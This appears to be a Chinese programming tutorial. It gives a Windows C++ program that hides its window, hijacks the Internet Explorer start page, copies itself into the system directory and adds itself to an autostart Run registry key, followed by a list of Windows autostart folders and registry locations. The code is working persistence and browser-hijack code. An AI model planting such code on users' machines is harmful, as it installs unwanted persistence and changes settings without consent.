// AutoRun.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" )
//用于修改字符串类型键值
void CreateStringReg(::HKEY hRoot, char* szSubKey, char* valueName, char* data) {
HKEY hKey;
//打开注册表键,不存在则创建它
long lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
if(lRet != ERROR_SUCCESS) {
printf("error no RegCreateKeyEx %s\n", szSubKey);
return;
}
//修改注册表简直,没有则创建它
lRet = RegSetValueEx(hKey, valueName, 0, REG_SZ, (BYTE*)data, strlen(data));
if(lRet != ERROR_SUCCESS) {
printf("error no RegSetValueEx %s\n", valueName);
return;
}
RegCloseKey(hKey);
}
//用于修改数字类型键值
void CreateDWORDReg(HKEY hRoot, char* szSubKey, char* valueName, DWORD data) {
HKEY hKey;
//打开注册表键,没有则创建它
long lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
if(lRet != ERROR_SUCCESS) {
printf("error no RegCreateKeyEx %s \n", szSubKey);
return;
}
DWORD dwSize = sizeof(DWORD);
//修改注册表键值,没有则创建他
lRet = RegSetValueEx(hKey, valueName, 0, REG_DWORD, (BYTE*)&data, dwSize);
if(lRet != ERROR_SUCCESS) {
printf("error no RegSetValueEx %s \n", valueName);
return;
}
RegCloseKey(hKey);
}
//修改IE首页
void modifyIEStartPage() {
//要修改成的网址
char startPage[255] = "http://pengranxiang.iteye.com/";
//调用修改字符串类型键值的函数
CreateStringReg(HKEY_CURRENT_USER, "Software\\Microsoft\\Internet Explorer\\Main", "Start Page", startPage);
}
//程序自复制 到系统目录
void copyItself() {
char modulePath[256];
char sysPath[256];
//取得程序名字
GetModuleFileName(NULL, modulePath, 256);
//取得系统根目录
GetSystemDirectory(sysPath, 256);
int ret = CopyFile(modulePath, strcat(sysPath, "\\AutoRun.exe"), TRUE);
if(ret) {
printf("%s has been copyed to sys dir %s \n", modulePath, sysPath);
} else {
printf("copy file error\n");
}
}
int main(int argc, char* argv[])
{
char regName[] = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
char keyName[] = "AutoRun";
char keyValue[] = "%systemroot%\\AutoRun.exe";
//如果%systemroot%下有AutoRun.exe这个文件,那么系统启动时就自行运行
CreateStringReg(HKEY_LOCAL_MACHINE, regName, keyName, keyValue);
//复制自己到%systemroot%下面,名字AutoRun.exe
copyItself();
return 0;
}
系统自启动位置:两个文件夹和八个注册表位置
一、当前用户专有的启动文件夹
这是许多应用软件自动启动的常用位置,Windows自动启动放入该文件夹的所有快捷方式。用户启动文件夹一般在:\Documents and Settings\<用户名字>\“开始”菜单\程序\启动,其中“<用户名字>”是当前登录的用户帐户名称。
二、对所有用户有效的启动文件夹
这是寻找自动启动程序的第二个重要位置,不管用户用什么身份登录系统,放入该文件夹的快捷方式总是自动启动——这是它与用户专有的启动文件夹的区别所 在。该文件夹一般在:\Documents and Settings\All Users\“开始”菜单\程序\启动。
三、Load注册键
介绍该注册键的资料不多,实际上它也能够自动启动程序。位置:HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows\load。
四、Userinit注册键
位置:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Userinit。 这里也能够使系统启动时自动初始化程序。通常该注册键下面有一个userinit.exe,如图一,但这个键允许指定用逗号分隔的多个程序,例如 “userinit.exe,OSA.exe”(不含引号)。
五、Explorer\Run注册键
和load、Userinit不同,Explorer\Run键在HKEY_CURRENT_USER和HKEY_LOCAL_MACHINE下都 有,具体位置 是:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,
和 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run。
六、RunServicesOnce注册键
RunServicesOnce注册键用来启动服务程序,启动时间在用户登录之前,而且先于其他通过注册键启动的程序。 RunServicesOnce注册键的位置 是:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce, 和 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce。
七、RunServices注册键
RunServices注册键指定的程序紧接RunServicesOnce指定的程序之后运行,但两者都在用户登录之前。RunServices的 位置 是:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices, 和 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices。
八、RunOnce\Setup注册键
RunOnce\Setup指定了用户登录之后运行的程序,它的位置 是:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup, 和 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Setup。
九、RunOnce注册键
安装程序通常用RunOnce键自动运行程序,它的位置在 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
和 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce。
HKEY_LOCAL_MACHINE下面的RunOnce键会在用户登录之后立即运行程序,运行时机在其他Run键指定的程序之前。 HKEY_CURRENT_USER下面的RunOnce键在操作系统处理其他Run键以及“启动”文件夹的内容之后运行。
如果是XP,你还需要检查一下 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx。
十、Run注册键
Run是自动运行程序最常用的注册键,位置 在:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run,
和 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run。 HKEY_CURRENT_USER下面的Run键紧接HKEY_LOCAL_MACHINE下面的Run键运行,但两者都在处理“启动”文件夹之前。